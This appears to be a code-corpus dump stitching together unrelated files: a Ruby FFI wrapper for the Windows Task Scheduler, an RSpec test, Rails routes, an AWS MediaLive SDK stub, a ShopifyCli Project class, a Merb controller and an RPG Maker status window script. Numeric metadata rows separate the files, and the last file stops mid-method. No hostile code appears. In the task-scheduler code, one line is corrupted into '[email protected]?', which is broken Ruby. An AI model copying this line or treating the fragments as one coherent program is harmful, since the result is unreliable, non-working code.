raise TypeError unless dir.is_a?(String)
if dir.length > MAX_PATH
raise Error, _('Working directory has exceeded maximum allowed length %{max}') % { max: MAX_PATH }
end
@pitask.SetWorkingDirectory(wide_string(dir))
dir
end
# Returns the task's priority level. Possible values are 'idle',
# 'normal', 'high', 'realtime', 'below_normal', 'above_normal',
# and 'unknown'.
#
def priority
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
priority_name = ''
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetPriority(ptr)
pri = ptr.read_dword
priority_name = if (pri & IDLE) != 0
'idle'
elsif (pri & NORMAL) != 0
'normal'
elsif (pri & HIGH) != 0
'high'
elsif (pri & REALTIME) != 0
'realtime'
elsif (pri & BELOW_NORMAL) != 0
'below_normal'
elsif (pri & ABOVE_NORMAL) != 0
'above_normal'
else
'unknown'
end
end
priority_name
end
# Sets the priority of the task. The +priority+ should be a numeric
# priority constant value.
#
def priority=(priority)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless priority.is_a?(Numeric)
@pitask.SetPriority(priority)
priority
end
# Creates a new work item (scheduled job) with the given +trigger+. The
# trigger variable is a hash of options that define when the scheduled
# job should run.
#
def new_work_item(task, trigger)
raise TypeError unless trigger.is_a?(Hash)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
# I'm working around github issue #1 here.
enum.each do |name|
if name.downcase == task.downcase + '.job'
raise Error, _("task '%{task}' already exists") % { task: task }
end
end
FFI::MemoryPointer.new(:pointer) do |ptr|
@pits.NewWorkItem(wide_string(task), CLSID_CTask, IID_ITask, ptr)
reset_current_task
@pitask = COM::Task.new(ptr.read_pointer)
FFI::MemoryPointer.new(:word, 1) do |trigger_index_ptr|
# Without the 'enum.include?' check above the code segfaults here if the
# task already exists. This should probably be handled properly instead
# of simply avoiding the issue.
@pitask.UseInstance(COM::TaskTrigger, :CreateTrigger, trigger_index_ptr) do |pitask_trigger|
populate_trigger(pitask_trigger, trigger)
end
end
end
# preload task with the SYSTEM account
# empty string '' means 'SYSTEM' per MSDN, so default it
# given an account is necessary for creation of a task
# note that a user may set SYSTEM explicitly, but that has problems
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381276(v=vs.85).aspx
set_account_information('', nil)
@pitask
end
alias new_task new_work_item
# Returns the number of triggers associated with the active task.
#
def trigger_count
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
count = 0
FFI::MemoryPointer.new(:word, 1) do |ptr|
@pitask.GetTriggerCount(ptr)
count = ptr.read_word
end
count
end
# Deletes the trigger at the specified index.
#
def delete_trigger(index)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.DeleteTrigger(index)
index
end
# Returns a hash that describes the trigger at the given index for the
# current task.
#
def trigger(index)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
trigger = {}
@pitask.UseInstance(COM::TaskTrigger, :GetTrigger, index) do |pitask_trigger|
FFI::MemoryPointer.new(COM::TASK_TRIGGER.size) do |task_trigger_ptr|
pitask_trigger.GetTrigger(task_trigger_ptr)
trigger = populate_hash_from_trigger(COM::TASK_TRIGGER.new(task_trigger_ptr))
end
end
trigger
end
# Sets the trigger for the currently active task.
#
def trigger=(trigger)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless trigger.is_a?(Hash)
FFI::MemoryPointer.new(:word, 1) do |trigger_index_ptr|
# Without the 'enum.include?' check above the code segfaults here if the
# task already exists. This should probably be handled properly instead
# of simply avoiding the issue.
@pitask.UseInstance(COM::TaskTrigger, :CreateTrigger, trigger_index_ptr) do |pitask_trigger|
populate_trigger(pitask_trigger, trigger)
end
end
trigger
end
# Adds a trigger at the specified index.
#
def add_trigger(index, trigger)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless trigger.is_a?(Hash)
@pitask.UseInstance(COM::TaskTrigger, :GetTrigger, index) do |pitask_trigger|
populate_trigger(pitask_trigger, trigger)
end
end
# Returns the flags (integer) that modify the behavior of the work item. You
# must OR the return value to determine the flags yourself.
#
def flags
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
flags = 0
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetFlags(ptr)
flags = ptr.read_dword
end
flags
end
# Sets an OR'd value of flags that modify the behavior of the work item.
#
def flags=(flags)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.SetFlags(flags)
flags
end
# Returns the status of the currently active task. Possible values are
# 'ready', 'running', 'not scheduled' or 'unknown'.
#
def status
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
st = nil
FFI::MemoryPointer.new(:hresult, 1) do |ptr|
@pitask.GetStatus(ptr)
st = ptr.read_hresult
end
status = case st
when SCHED_S_TASK_READY
'ready'
when SCHED_S_TASK_RUNNING
'running'
when SCHED_S_TASK_NOT_SCHEDULED
'not scheduled'
else
'unknown'
end
status
end
# Returns the exit code from the last scheduled run.
#
def exit_code
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
status = 0
begin
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetExitCode(ptr)
status = ptr.read_dword
end
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_S_TASK_HAS_NOT_RUN
end
status
end
# Returns the comment associated with the task, if any.
#
def comment
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
comment = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetComment(ptr)
ptr.read_com_memory_pointer do |str_ptr|
comment = str_ptr.read_arbitrary_wide_string_up_to(MAX_COMMENT_LENGTH) unless str_ptr.null?
end
end
comment
end
# Sets the comment for the task.
#
def comment=(comment)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless comment.is_a?(String)
if comment.length > MAX_COMMENT_LENGTH
raise Error, _('Comment has exceeded maximum allowed length %{max}') % { max: MAX_COMMENT_LENGTH }
end
@pitask.SetComment(wide_string(comment))
comment
end
# Returns the name of the user who created the task.
#
def creator
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
creator = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetCreator(ptr)
ptr.read_com_memory_pointer do |str_ptr|
creator = str_ptr.read_arbitrary_wide_string_up_to(MAX_ACCOUNT_LENGTH) unless str_ptr.null?
end
end
creator
end
# Sets the creator for the task.
#
def creator=(creator)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless creator.is_a?(String)
if creator.length > MAX_ACCOUNT_LENGTH
raise Error, _('Creator has exceeded maximum allowed length %{max}') % { max: MAX_ACCOUNT_LENGTH }
end
@pitask.SetCreator(wide_string(creator))
creator
end
# Returns a Time object that indicates the next time the task will run.
#
def next_run_time
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
time = nil
FFI::MemoryPointer.new(WIN32::SYSTEMTIME.size) do |ptr|
@pitask.GetNextRunTime(ptr)
time = WIN32::SYSTEMTIME.new(ptr).to_local_time
end
time
end
# Returns a Time object indicating the most recent time the task ran or
# nil if the task has never run.
#
def most_recent_run_time
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
time = nil
begin
FFI::MemoryPointer.new(WIN32::SYSTEMTIME.size) do |ptr|
@pitask.GetMostRecentRunTime(ptr)
time = WIN32::SYSTEMTIME.new(ptr).to_local_time
end
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_S_TASK_HAS_NOT_RUN
end
time
end
# Returns the maximum length of time, in milliseconds, that the task
# will run before terminating.
#
def max_run_time
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
max_run_time = nil
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetMaxRunTime(ptr)
max_run_time = ptr.read_dword
end
max_run_time
end
# Sets the maximum length of time, in milliseconds, that the task can run
# before terminating. Returns the value you specified if successful.
#
def max_run_time=(max_run_time)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless max_run_time.is_a?(Numeric)
@pitask.SetMaxRunTime(max_run_time)
max_run_time
end
# Returns whether or not the scheduled task exists.
def exists?(job_name)
# task name comparison is case insensitive
tasks.any? { |name| name.casecmp(job_name + '.job') == 0 }
end
private
# :stopdoc:
# Used for the new_work_item method
ValidTriggerKeys = [
'end_day',
'end_month',
'end_year',
'flags',
'minutes_duration',
'minutes_interval',
'random_minutes_interval',
'start_day',
'start_hour',
'start_minute',
'start_month',
'start_year',
'trigger_type',
'type',
].freeze
ValidTypeKeys = [
'days_interval',
'weeks_interval',
'days_of_week',
'months',
'days',
'weeks',
].freeze
# Private method that validates keys, and converts all keys to lowercase
# strings.
#
def transform_and_validate(hash)
new_hash = {}
hash.each do |key, value|
key = key.to_s.downcase
if key == 'type'
new_type_hash = {}
raise ArgumentError unless value.is_a?(Hash)
value.each do |subkey, subvalue|
subkey = subkey.to_s.downcase
raise ArgumentError, _("Invalid type key '%{key}'") % { key: subkey } unless ValidTypeKeys.include?(subkey)
new_type_hash[subkey] = subvalue
end
new_hash[key] = new_type_hash
elsif ValidTriggerKeys.include?(key)
new_hash[key] = value
else
raise ArgumentError, _("Invalid key '%{key}'") % { key: key }
end
end
new_hash
end
def reset_current_task
# Ensure that COM reference is decremented properly
@pitask.Release if @pitask && [email protected]?
@pitask = nil
@account_information_set = false
end
def populate_trigger(task_trigger, trigger)
raise TypeError unless task_trigger.is_a?(COM::TaskTrigger)
trigger = transform_and_validate(trigger)
FFI::MemoryPointer.new(COM::TASK_TRIGGER.size) do |trigger_ptr|
FFI::MemoryPointer.new(COM::TRIGGER_TYPE_UNION.size) do |trigger_type_union_ptr|
trigger_type_union = COM::TRIGGER_TYPE_UNION.new(trigger_type_union_ptr)
tmp = trigger['type'].is_a?(Hash) ? trigger['type'] : nil
case trigger['trigger_type']
when :TASK_TIME_TRIGGER_DAILY
if tmp && tmp['days_interval']
trigger_type_union[:Daily][:DaysInterval] = tmp['days_interval']
end
when :TASK_TIME_TRIGGER_WEEKLY
if tmp && tmp['weeks_interval'] && tmp['days_of_week']
trigger_type_union[:Weekly][:WeeksInterval] = tmp['weeks_interval']
trigger_type_union[:Weekly][:rgfDaysOfTheWeek] = tmp['days_of_week']
end
when :TASK_TIME_TRIGGER_MONTHLYDATE
if tmp && tmp['months'] && tmp['days']
trigger_type_union[:MonthlyDate][:rgfDays] = tmp['days']
trigger_type_union[:MonthlyDate][:rgfMonths] = tmp['months']
end
when :TASK_TIME_TRIGGER_MONTHLYDOW
if tmp && tmp['weeks'] && tmp['days_of_week'] && tmp['months']
trigger_type_union[:MonthlyDOW][:wWhichWeek] = tmp['weeks']
trigger_type_union[:MonthlyDOW][:rgfDaysOfTheWeek] = tmp['days_of_week']
trigger_type_union[:MonthlyDOW][:rgfMonths] = tmp['months']
end
when :TASK_TIME_TRIGGER_ONCE
# Do nothing. The Type member of the TASK_TRIGGER struct is ignored.
nil
else
raise Error, _('Unknown trigger type %{type}') % { type: trigger['trigger_type'] }
end
trigger_struct = COM::TASK_TRIGGER.new(trigger_ptr)
trigger_struct[:cbTriggerSize] = COM::TASK_TRIGGER.size
now = Time.now
trigger_struct[:wBeginYear] = trigger['start_year'] || now.year
trigger_struct[:wBeginMonth] = trigger['start_month'] || now.month
trigger_struct[:wBeginDay] = trigger['start_day'] || now.day
trigger_struct[:wEndYear] = trigger['end_year'] || 0
trigger_struct[:wEndMonth] = trigger['end_month'] || 0
trigger_struct[:wEndDay] = trigger['end_day'] || 0
trigger_struct[:wStartHour] = trigger['start_hour'] || 0
trigger_struct[:wStartMinute] = trigger['start_minute'] || 0
trigger_struct[:MinutesDuration] = trigger['minutes_duration'] || 0
trigger_struct[:MinutesInterval] = trigger['minutes_interval'] || 0
trigger_struct[:rgFlags] = trigger['flags'] || 0
trigger_struct[:TriggerType] = trigger['trigger_type'] || :TASK_TIME_TRIGGER_ONCE
trigger_struct[:Type] = trigger_type_union
trigger_struct[:wRandomMinutesInterval] = trigger['random_minutes_interval'] || 0
task_trigger.SetTrigger(trigger_struct)
end
end
end
def populate_hash_from_trigger(task_trigger)
raise TypeError unless task_trigger.is_a?(COM::TASK_TRIGGER)
trigger = {
'start_year' => task_trigger[:wBeginYear],
'start_month' => task_trigger[:wBeginMonth],
'start_day' => task_trigger[:wBeginDay],
'end_year' => task_trigger[:wEndYear],
'end_month' => task_trigger[:wEndMonth],
'end_day' => task_trigger[:wEndDay],
'start_hour' => task_trigger[:wStartHour],
'start_minute' => task_trigger[:wStartMinute],
'minutes_duration' => task_trigger[:MinutesDuration],
'minutes_interval' => task_trigger[:MinutesInterval],
'flags' => task_trigger[:rgFlags],
'trigger_type' => task_trigger[:TriggerType],
'random_minutes_interval' => task_trigger[:wRandomMinutesInterval],
}
case task_trigger[:TriggerType]
when :TASK_TIME_TRIGGER_DAILY
trigger['type'] = { 'days_interval' => task_trigger[:Type][:Daily][:DaysInterval] }
when :TASK_TIME_TRIGGER_WEEKLY
trigger['type'] = {
'weeks_interval' => task_trigger[:Type][:Weekly][:WeeksInterval],
'days_of_week' => task_trigger[:Type][:Weekly][:rgfDaysOfTheWeek],
}
when :TASK_TIME_TRIGGER_MONTHLYDATE
trigger['type'] = {
'days' => task_trigger[:Type][:MonthlyDate][:rgfDays],
'months' => task_trigger[:Type][:MonthlyDate][:rgfMonths],
}
when :TASK_TIME_TRIGGER_MONTHLYDOW
trigger['type'] = {
'weeks' => task_trigger[:Type][:MonthlyDOW][:wWhichWeek],
'days_of_week' => task_trigger[:Type][:MonthlyDOW][:rgfDaysOfTheWeek],
'months' => task_trigger[:Type][:MonthlyDOW][:rgfMonths],
}
when :TASK_TIME_TRIGGER_ONCE
trigger['type'] = { 'once' => nil }
else
raise Error, _('Unknown trigger type %{type}') % { type: task_trigger[:TriggerType] }
end
trigger
end
module COM
extend FFI::Library
com = Puppet::Util::Windows::COM
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381811(v=vs.85).aspx
ITaskScheduler = com::Interface[com::IUnknown,
FFI::WIN32::GUID['148BD527-A2AB-11CE-B11F-00AA00530503'],
SetTargetComputer: [[:lpcwstr], :hresult],
# LPWSTR *
GetTargetComputer: [[:pointer], :hresult],
# IEnumWorkItems **
Enum: [[:pointer], :hresult],
# LPCWSTR, REFIID, IUnknown **
Activate: [[:lpcwstr, :pointer, :pointer], :hresult],
Delete: [[:lpcwstr], :hresult],
# LPCWSTR, REFCLSID, REFIID, IUnknown **
NewWorkItem: [[:lpcwstr, :pointer, :pointer, :pointer], :hresult],
# LPCWSTR, IScheduledWorkItem *
AddWorkItem: [[:lpcwstr, :pointer], :hresult],
# LPCWSTR, REFIID
IsOfType: [[:lpcwstr, :pointer], :hresult]
]
TaskScheduler = com::Factory[ITaskScheduler,
FFI::WIN32::GUID['148BD52A-A2AB-11CE-B11F-00AA00530503']]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa380706(v=vs.85).aspx
IEnumWorkItems = com::Interface[com::IUnknown,
FFI::WIN32::GUID['148BD528-A2AB-11CE-B11F-00AA00530503'],
# ULONG, LPWSTR **, ULONG *
Next: [[:win32_ulong, :pointer, :pointer], :hresult],
Skip: [[:win32_ulong], :hresult],
Reset: [[], :hresult],
# IEnumWorkItems ** ppEnumWorkItems
Clone: [[:pointer], :hresult]
]
EnumWorkItems = com::Instance[IEnumWorkItems]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381216(v=vs.85).aspx
IScheduledWorkItem = com::Interface[com::IUnknown,
FFI::WIN32::GUID['a6b952f0-a4b1-11d0-997d-00aa006887ec'],
# WORD *, ITaskTrigger **
CreateTrigger: [[:pointer, :pointer], :hresult],
DeleteTrigger: [[:word], :hresult],
# WORD *
GetTriggerCount: [[:pointer], :hresult],
# WORD, ITaskTrigger **
GetTrigger: [[:word, :pointer], :hresult],
# WORD, LPWSTR *
GetTriggerString: [[:word, :pointer], :hresult],
# LPSYSTEMTIME, LPSYSTEMTIME, WORD *, LPSYSTEMTIME *
GetRunTimes: [[:pointer, :pointer, :pointer, :pointer], :hresult],
# SYSTEMTIME *
GetNextRunTime: [[:pointer], :hresult],
SetIdleWait: [[:word, :word], :hresult],
# WORD *, WORD *
GetIdleWait: [[:pointer, :pointer], :hresult],
Run: [[], :hresult],
Terminate: [[], :hresult],
EditWorkItem: [[:hwnd, :dword], :hresult],
# SYSTEMTIME *
GetMostRecentRunTime: [[:pointer], :hresult],
# HRESULT *
GetStatus: [[:pointer], :hresult],
GetExitCode: [[:pdword], :hresult],
SetComment: [[:lpcwstr], :hresult],
# LPWSTR *
GetComment: [[:pointer], :hresult],
SetCreator: [[:lpcwstr], :hresult],
# LPWSTR *
GetCreator: [[:pointer], :hresult],
# WORD, BYTE[]
SetWorkItemData: [[:word, :buffer_in], :hresult],
# WORD *, BYTE **
GetWorkItemData: [[:pointer, :pointer], :hresult],
SetErrorRetryCount: [[:word], :hresult],
# WORD *
GetErrorRetryCount: [[:pointer], :hresult],
SetErrorRetryInterval: [[:word], :hresult],
# WORD *
GetErrorRetryInterval: [[:pointer], :hresult],
SetFlags: [[:dword], :hresult],
# WORD *
GetFlags: [[:pointer], :hresult],
SetAccountInformation: [[:lpcwstr, :lpcwstr], :hresult],
# LPWSTR *
GetAccountInformation: [[:pointer], :hresult]
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381311(v=vs.85).aspx
ITask = com::Interface[IScheduledWorkItem,
FFI::WIN32::GUID['148BD524-A2AB-11CE-B11F-00AA00530503'],
SetApplicationName: [[:lpcwstr], :hresult],
# LPWSTR *
GetApplicationName: [[:pointer], :hresult],
SetParameters: [[:lpcwstr], :hresult],
# LPWSTR *
GetParameters: [[:pointer], :hresult],
SetWorkingDirectory: [[:lpcwstr], :hresult],
# LPWSTR *
GetWorkingDirectory: [[:pointer], :hresult],
SetPriority: [[:dword], :hresult],
# DWORD *
GetPriority: [[:pointer], :hresult],
SetTaskFlags: [[:dword], :hresult],
# DWORD *
GetTaskFlags: [[:pointer], :hresult],
SetMaxRunTime: [[:dword], :hresult],
# DWORD *
GetMaxRunTime: [[:pointer], :hresult]
]
Task = com::Instance[ITask]
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms688695(v=vs.85).aspx
IPersist = com::Interface[com::IUnknown,
FFI::WIN32::GUID['0000010c-0000-0000-c000-000000000046'],
# CLSID *
GetClassID: [[:pointer], :hresult]
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms687223(v=vs.85).aspx
IPersistFile = com::Interface[IPersist,
FFI::WIN32::GUID['0000010b-0000-0000-C000-000000000046'],
IsDirty: [[], :hresult],
Load: [[:lpcolestr, :dword], :hresult],
Save: [[:lpcolestr, :win32_bool], :hresult],
SaveCompleted: [[:lpcolestr], :hresult],
# LPOLESTR *
GetCurFile: [[:pointer], :hresult]
]
PersistFile = com::Instance[IPersistFile]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381864(v=vs.85).aspx
ITaskTrigger = com::Interface[com::IUnknown,
FFI::WIN32::GUID['148BD52B-A2AB-11CE-B11F-00AA00530503'],
SetTrigger: [[:pointer], :hresult],
GetTrigger: [[:pointer], :hresult],
GetTriggerString: [[:pointer], :hresult]
]
TaskTrigger = com::Instance[ITaskTrigger]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383620(v=vs.85).aspx
# The TASK_TRIGGER_TYPE field of the TASK_TRIGGER structure determines
# which member of the TRIGGER_TYPE_UNION field to use.
TASK_TRIGGER_TYPE = enum(
:TASK_TIME_TRIGGER_ONCE, 0, # Ignore the Type field
:TASK_TIME_TRIGGER_DAILY, 1,
:TASK_TIME_TRIGGER_WEEKLY, 2,
:TASK_TIME_TRIGGER_MONTHLYDATE, 3,
:TASK_TIME_TRIGGER_MONTHLYDOW, 4,
:TASK_EVENT_TRIGGER_ON_IDLE, 5, # Ignore the Type field
:TASK_EVENT_TRIGGER_AT_SYSTEMSTART, 6, # Ignore the Type field
:TASK_EVENT_TRIGGER_AT_LOGON, 7 # Ignore the Type field
)
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa446857(v=vs.85).aspx
class DAILY < FFI::Struct
layout :DaysInterval, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa384014(v=vs.85).aspx
class WEEKLY < FFI::Struct
layout :WeeksInterval, :word,
:rgfDaysOfTheWeek, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381918(v=vs.85).aspx
class MONTHLYDATE < FFI::Struct
layout :rgfDays, :dword,
:rgfMonths, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381918(v=vs.85).aspx
class MONTHLYDOW < FFI::Struct
layout :wWhichWeek, :word,
:rgfDaysOfTheWeek, :word,
:rgfMonths, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa384002(v=vs.85).aspx
class TRIGGER_TYPE_UNION < FFI::Union
layout :Daily, DAILY,
:Weekly, WEEKLY,
:MonthlyDate, MONTHLYDATE,
:MonthlyDOW, MONTHLYDOW
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383618(v=vs.85).aspx
class TASK_TRIGGER < FFI::Struct
layout :cbTriggerSize, :word, # Structure size.
:Reserved1, :word, # Reserved. Must be zero.
:wBeginYear, :word, # Trigger beginning date year.
:wBeginMonth, :word, # Trigger beginning date month.
:wBeginDay, :word, # Trigger beginning date day.
:wEndYear, :word, # Optional trigger ending date year.
:wEndMonth, :word, # Optional trigger ending date month.
:wEndDay, :word, # Optional trigger ending date day.
:wStartHour, :word, # Run bracket start time hour.
:wStartMinute, :word, # Run bracket start time minute.
:MinutesDuration, :dword, # Duration of run bracket.
:MinutesInterval, :dword, # Run bracket repetition interval.
:rgFlags, :dword, # Trigger flags.
:TriggerType, TASK_TRIGGER_TYPE, # Trigger type.
:Type, TRIGGER_TYPE_UNION, # Trigger data.
:Reserved2, :word, # Reserved. Must be zero.
:wRandomMinutesInterval, :word # Maximum number of random minutes after start time
end
end
end
| 36.48265 | 126 | 0.620147 |
382efd6b10db211a2461166e7f9eb8c62d801591 | 621 | require 'rails_helper'
RSpec.describe CollectionObjectObservation, type: :model, group: :collection_objects do
let(:collection_object_observation) { CollectionObjectObservation.new }
context 'validation' do
before {collection_object_observation.valid?}
specify 'data is required' do
expect(collection_object_observation.errors.include?(:data)).to be_truthy
end
end
specify 'data is not trimmed' do
s = " asdf sd \n asdfd \r\n"
collection_object_observation.data = s
collection_object_observation.valid?
expect(collection_object_observation.data).to eq(s)
end
end
| 27 | 87 | 0.747182 |
1d8573b89c4e3377e2a00e0d79d60cf6f9345eb8 | 336 | Refinery::Application.routes.draw do
scope(:path => 'refinery', :as => 'admin', :module => 'admin') do
match 'dashboard',
:to => 'dashboard#index',
:as => :dashboard
match 'disable_upgrade_message',
:to => 'dashboard#disable_upgrade_message',
:as => :disable_upgrade_message
end
end
| 28 | 67 | 0.60119 |
e833564e2ebc69a39caa16c4fa4c61614d330802 | 1,453 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-medialive/types'
require_relative 'aws-sdk-medialive/client_api'
require_relative 'aws-sdk-medialive/client'
require_relative 'aws-sdk-medialive/errors'
require_relative 'aws-sdk-medialive/waiters'
require_relative 'aws-sdk-medialive/resource'
require_relative 'aws-sdk-medialive/customizations'
# This module provides support for AWS Elemental MediaLive. This module is available in the
# `aws-sdk-medialive` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# media_live = Aws::MediaLive::Client.new
# resp = media_live.accept_input_device_transfer(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from AWS Elemental MediaLive are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::MediaLive::Errors::ServiceError
# # rescues all AWS Elemental MediaLive API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::MediaLive
GEM_VERSION = '1.75.0'
end
| 26.418182 | 91 | 0.752237 |
3304ed19d7263c189a83617b76bc2a0dc35abf23 | 5,897 | # frozen_string_literal: true
require 'shopify_cli'
module ShopifyCli
##
# ShopifyCli::Project captures the current project that the user is working on.
# This class can be used to fetch and save project environment as well as the
# project config `.shopify-cli.yml`.
#
class Project
include SmartProperties
class << self
##
# will get an instance of the project that the user is currently operating
# on. This is used for access to project resources.
#
# #### Parameters
#
# * `force_reload` - whether to force a reload of the project files
#
# #### Returns
#
# * `project` - a Project instance if the user is currently in the project.
#
# #### Raises
#
# * `ShopifyCli::Abort` - If the cli is not currently in a project directory
# then this will be raised with a message implying that the user is not in
# a project directory.
#
# #### Example
#
# project = ShopifyCli::Project.current
#
def current(force_reload: false)
clear if force_reload
at(Dir.pwd)
end
##
# will return true if the command line is currently within a project
#
# #### Returns
#
# * `has_current?` - boolean, true if there is a current project
#
def has_current?
!directory(Dir.pwd).nil?
end
##
# will fetch the project type of the current project. This is mostly used
# for internal project type loading, you should not normally need this.
#
# #### Returns
#
# * `type` - a symbol of the name of the project type identifier. i.e. [rails, node]
# This will be nil if the user is not in a current project.
#
# #### Example
#
# type = ShopifyCli::Project.current_project_type
#
def current_project_type
return unless has_current?
current.config['project_type'].to_sym
end
##
# writes out the `.shopify-cli.yml` file. You should use this when creating
# a project type so that the rest of your project type commands will load
# in this project, in the future.
#
# #### Parameters
#
# * `ctx` - the current running context of your command
# * `project_type` - a string or symbol of your project type name
# * `organization_id` - the id of the partner organization that the app is owned by. Used for metrics
# * `identifiers` - an optional hash of other app identifiers
#
# #### Example
#
# type = ShopifyCli::Project.current_project_type
#
def write(ctx, project_type:, organization_id:, **identifiers)
require 'yaml' # takes 20ms, so deferred as late as possible.
content = Hash[{ project_type: project_type, organization_id: organization_id.to_i }
.merge(identifiers)
.collect { |k, v| [k.to_s, v] }]
content['shopify_organization'] = true if Shopifolk.acting_as_shopify_organization?
ctx.write('.shopify-cli.yml', YAML.dump(content))
clear
end
def project_name
File.basename(current.directory)
end
def clear
@at = nil
@dir = nil
end
private
def directory(dir)
@dir ||= Hash.new { |h, k| h[k] = __directory(k) }
@dir[dir]
end
def at(dir)
proj_dir = directory(dir)
unless proj_dir
raise(ShopifyCli::Abort, Context.message('core.project.error.not_in_project'))
end
@at ||= Hash.new { |h, k| h[k] = new(directory: k) }
@at[proj_dir]
end
def __directory(curr)
loop do
return nil if curr == '/' || /^[A-Z]:\/$/.match?(curr)
file = File.join(curr, '.shopify-cli.yml')
return curr if File.exist?(file)
curr = File.dirname(curr)
end
end
end
property :directory # :nodoc:
##
# will read, parse and return the envfile for the project
#
# #### Returns
#
# * `env` - An instance of a ShopifyCli::Resources::EnvFile
#
# #### Example
#
# ShopifyCli::Project.current.env
#
def env
@env ||= begin
Resources::EnvFile.read(directory)
rescue Errno::ENOENT
nil
end
end
##
# will read, parse and return the .shopify-cli.yml for the project
#
# #### Returns
#
# * `config` - A hash of configuration
#
# #### Raises
#
# * `ShopifyCli::Abort` - If the yml is invalid or poorly formatted
# * `ShopifyCli::Abort` - If the yml file does not exist
#
# #### Example
#
# ShopifyCli::Project.current.config
#
def config
@config ||= begin
config = load_yaml_file('.shopify-cli.yml')
unless config.is_a?(Hash)
raise ShopifyCli::Abort, Context.message('core.yaml.error.not_hash', '.shopify-cli.yml')
end
# The app_type key was deprecated in favour of project_type, so replace it
if config.key?('app_type')
config['project_type'] = config['app_type']
config.delete('app_type')
end
config
end
end
private
def load_yaml_file(relative_path)
f = File.join(directory, relative_path)
require 'yaml' # takes 20ms, so deferred as late as possible.
begin
YAML.load_file(f)
rescue Psych::SyntaxError => e
raise(ShopifyCli::Abort, Context.message('core.yaml.error.invalid', relative_path, e.message))
# rescue Errno::EACCES => e
# TODO
# Dev::Helpers::EaccesHandler.diagnose_and_raise(f, e, mode: :read)
rescue Errno::ENOENT
raise ShopifyCli::Abort, Context.message('core.yaml.error.not_found', f)
end
end
end
end
| 28.906863 | 107 | 0.583008 |
39e376ab634210e50280b3abadfaf6f4802a5be4 | 87 | class RfeedfinderSlice::Application < Merb::Controller
controller_for_slice
end | 17.4 | 54 | 0.793103 |
4a012cf0ae48163207313ff50a3f502c669e3263 | 5,087 | #==============================================================================
# ** Window_MenuStatus
#------------------------------------------------------------------------------
# This window displays party member status on the menu screen.
#==============================================================================
class Window_Status < Window_Selectable
#--------------------------------------------------------------------------
# * Object Initialization
#--------------------------------------------------------------------------
def initialize(actor)
super(0, 0, Graphics.width, Graphics.height)
@actor = actor
refresh
activate
end
#--------------------------------------------------------------------------
# * Set Actor
#--------------------------------------------------------------------------
def actor=(actor)
return if @actor == actor
@actor = actor
refresh
end
#--------------------------------------------------------------------------
# * Refresh
#--------------------------------------------------------------------------
def refresh
contents.clear
draw_block1 (line_height * 0)
draw_horz_line(line_height * 1)
draw_block2 (line_height * 2)
draw_horz_line(line_height * 6)
draw_block3 (line_height * 7)
